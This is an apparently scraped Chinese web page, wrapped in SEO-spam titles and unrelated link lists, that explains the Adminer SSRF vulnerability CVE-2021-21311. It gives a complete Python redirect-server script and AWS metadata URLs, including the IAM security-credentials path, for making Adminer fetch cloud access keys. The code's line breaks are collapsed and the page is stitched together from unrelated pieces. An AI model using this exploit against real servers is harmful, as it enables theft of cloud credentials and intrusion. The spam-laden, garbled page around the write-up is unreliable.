当前位置: 首页 > news >正文

做网站需要什么服务器seo刷词工具在线

news 2025/7/21 13:17:05
做网站需要什么服务器,seo刷词工具在线,青岛茶叶网站建设,临沂建站平台Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞&#xff08…

Adminer是一个PHP编写的开源数据库管理工具,支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。

参考连接:

https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

1.在Adminer登录页面,选择ElasticSearch作为系统目标,并在server字段填写`example.com`,点击登录即可看到`example.com`返回的400错误页面展示在页面中

Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com)

使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。

参考链接:

  • SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHub
  • https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd

首先,启动一个python服务器,该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下,重定向指向AWS元数据服务:

http://169.254.169.254/latest/meta-data/instance-id

然后,在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器,这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。

重定向请求的python脚本:

#!/usr/bin/env pythonimport SimpleHTTPServer
import SocketServer
import sys
import argparsedef redirect_handler_factory(url):"""Returns a request handler class that redirects to supplied `url`"""class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header('Location', url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header('Location', url)self.end_headers()return RedirectHandlerdef main():parser = argparse.ArgumentParser(description='HTTP redirect server')parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')parser.add_argument('redirect_url', action="store")myargs = parser.parse_args()redirect_url = myargs.redirect_urlport = myargs.porthost = myargs.ipredirectHandler = redirect_handler_factory(redirect_url)handler = SocketServer.TCPServer((host, port), redirectHandler)print("serving at port %s" % port)handler.serve_forever()if __name__ == "__main__":main()
http://169.254.169.254/latest/meta-data/iam/security-credentials/  //列出服务器的可用角色。
http://www.mnyf.cn/news/50969.html

相关文章:

  • 又好又快自助建站百度统计代码安装位置
  • 西安做网站哪家好叶涛网站推广优化
  • wordpress插件云采集seo怎么优化方法
  • 泊头那家做网站类似火脉的推广平台
  • 单页网站怎么卖百度快速seo软件
  • psd企业网站模板成功营销案例分享
  • 做网站大概要多久鞍山做网站的公司
  • .net 网站生成安装文件目录英文谷歌优化
  • 贵阳查房子备案的网站重庆企业免费建站
  • 江苏润祥建设集团网站数据网站
  • ftp免费网站空间生成关键词的软件
  • 莆田建网站公司廊坊seo排名公司
  • 海南专业网站建设培训网站制作
  • 网站优化的常见问题360优化大师下载官网
  • 自己怎么做网站链接seo外链优化培训
  • 公司网站建设费用 知乎北京互联网公司有哪些
  • 深圳建设项目环保网站办事指南我是做推广的怎么找客户
  • 品牌网站建设优化公司排名seo查询官网
  • wordpress5.0.2取消了链接seo优化系统
  • app软件开发网站免费推广网
  • 海口网约车资格证在哪里报名郑州百度seo关键词
  • 可以随意做配搭的网站网站seo优化外包顾问
  • 外贸网站建设上海seo点击排名软件营销工具
  • 网架公司联系方式贺州seo
  • 做lgoo的网站一般有哪些如何让百度收录
  • 网站文章正文可以做内链吗企业如何注册自己的网站
  • 福州网站平台建设公司长沙seo袁飞
  • 营口汽车网站建设做seo有什么好处
  • 软件开发接单网站软文
  • vue可以做网站吗营销型网站建设价格